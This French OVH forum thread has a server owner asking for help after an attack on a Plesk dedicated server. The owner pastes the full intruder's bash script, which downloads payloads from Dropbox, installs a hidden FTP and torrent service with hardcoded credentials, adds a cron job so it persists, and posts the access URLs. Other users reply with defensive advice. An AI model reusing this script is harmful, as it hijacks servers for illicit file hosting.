OVH Community, votre nouvel espace communautaire.

Attaque sur Serveur dédidé Plesk - Que faire ?


lxwfr
09/12/2015, 23h07
il faut se méfier des maj auto, une vérification manuel est primordiale

Rizz
04/12/2015, 22h56
xmlrpc.php c'était y'a X ou Y ans...
C'est bien de mettre une régle F2B mais "elle sert à rien" depuis wp 4.0

Et donc en solution y'a :
s'informer
faire du tutoriel...
ou payer.

TBC_Ly0n
04/12/2015, 10h50
L'attaquant a obtenu un Shell. C'est le pire cas qu'on puisse rencontrer.
Plusieurs options :
- réinstallation complète en réutilisant le moins d'éléments possibles du serveur actuel (pour éviter de remettre les saloperies déposées)
- fouiller de partout pour trouver toutes les traces d'infection. Sachant qu'il a eu accès au shell, il a eu tout loisir de faire des escalades de privilèges, changer les dates de fichiers et réinserer tout plein d'éléments pour être sur de conserver l'accès au serveur. Il y en a pour plusieurs heures voire dizaine d'heures de travail, sans garantie que ce soit suffisant...

WordPress est codé avec les pieds, et en plus, il manquait des orteils !
Dès que j'en vois un, je bloque l'accès à xmlrpc.php... source de la plupart des attaques.

Bon courage.

janus57
01/12/2015, 17h43
Bonjour,

Est-ce qu'il existe des sociétés qui font de l'hébergement est qui peuvent gérer également la sécurité du serveur ?
soit ce sont des hébergement mutualisé, soit c'est de l'infogérance, le plus cher étant l'infogérance (rajouter minimum 50€/mois en plus du prix du serveur).

Cordialement, janus57

ludm
01/12/2015, 13h43
Plesk est à jour avec les installations automatiques, après les CMS comme Moodle et Wordpress ne sont pas forcément à jour :-(

Est-ce qu'il existe des sociétés qui font de l'hébergement est qui peuvent gérer également la sécurité du serveur ?

bbr18
01/12/2015, 08h46
bonjour
alors sans vouloir être pessimiste, en général serveur hacké = réinstallation
mais il faudrait savoir par où est entré ton hackeur, la distribution sur ton serveur était-elle à jour, Plesk à jour, les CMS à jour ?

ludm
01/12/2015, 03h28
Bonjour,

Je viens de m’apercevoir d'une attaque sur mon serveur dédié avec ce script hébergé directement sur nsxxxx.ovh.net/.lescript :
#!/bin/bash
#!/bin/sh
readonly path=$(pwd)
readonly system=$(uname -m)
readonly ip=$(dig myip.opendns.com @resolver1.opendns.com +short)
readonly pass="sftd_"$(date | md5sum | head -c 8)
readonly ftpstart="./start.sh"
readonly torrentstart="./torrent.sh"
readonly cronscript="cron.sh"

wget --no-check-certificate http://dl.dropboxusercontent.com/s/n...kd/sftd.tar.gz
if [ "$system" = "x86_64" ]; then
wget -O java.tar.gz --no-check-certificate http://dl.dropboxusercontent.com/s/r...nux-x64.tar.gz
else
wget -O java.tar.gz --no-check-certificate http://dl.dropboxusercontent.com/s/z...ux-i586.tar.gz
fi

tar xvf sftd.tar.gz
tar xvf java.tar.gz
rm sftd.tar.gz
rm java.tar.gz

echo "fill;$pass;%home%/home;true;0;0;0;0;true" > conf/users.conf
echo "leech;sftdevils;%home%/home;false;0;0;0;0;true" >> conf/users.conf
echo "cd "$path"" > $cronscript
echo "date > log" >> $cronscript
echo "$ftpstart > /dev/null &" >> $cronscript
echo "$torrentstart > /dev/null &" >> $cronscript
chmod +x $cronscript
chmod +x $ftpstart
chmod +x $torrentstart
crontab -l > cronjob
echo "*/5 * * * * "$path/$cronscript"" >> cronjob
crontab cronjob
rm cronjob

echo "[CENTER]" > info
echo "ServerInfo:" >> info
echo "" >> info
uname -a >> info
echo "" >> info
df -h >> info
echo "" >> info
echo "Uptime: " >> info
uptime >> info
echo "" >> info
echo "MyLoc:" >> info
wget -O /tmp/6 http://speed.myloc.de/100M.bin 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "Leaseweb" >> info
wget -O /tmp/5 http://mirror.leaseweb.com/speedtest/100mb.bin 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "OVHFR1:" >> info
wget -O /tmp/1 http://rbx.proof.ovh.net/files/100Mio.dat 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "OVHFR2:" >> info
wget -O /tmp/2 http://sbg.proof.ovh.net/files/100Mio.dat 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "OVHFR3:" >> info
wget -O /tmp/4 http://gra.proof.ovh.net/files/100Mio.dat 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "OVHCA1:" >> info
wget -O /tmp/3 http://bhs.proof.ovh.net/files/100Mio.dat 2>&1 | grep '\([0-9.]\+ [KM]B/s\)' >> info
echo "" >> info
echo "" >> info
echo "[HIDE-REPLY]" >> info
echo "[CODE]" >> info
echo "ftp://fill:$pass@$ip:49175/" >> info
echo "ftp://leech:sftdevils@$ip:49175/" >> info
echo "[ /CODE]" >> info
echo "[ /HIDE-REPLY]" >> info
echo "[ /CENTER]" >> info
./$cronscript >/dev/null 2>&1 &
rm sftd.sh
Le tout a pour but de stocker des fichiers sur le serveur tranquillement dans le dossier nsxxxx.ovh.net/css/.trash-1000/

Est-ce qu'il peut s'agir d'une faille de Plesk ?
Si vous avez une solution/des suggestions pour parer cette attaque, je suis preneur.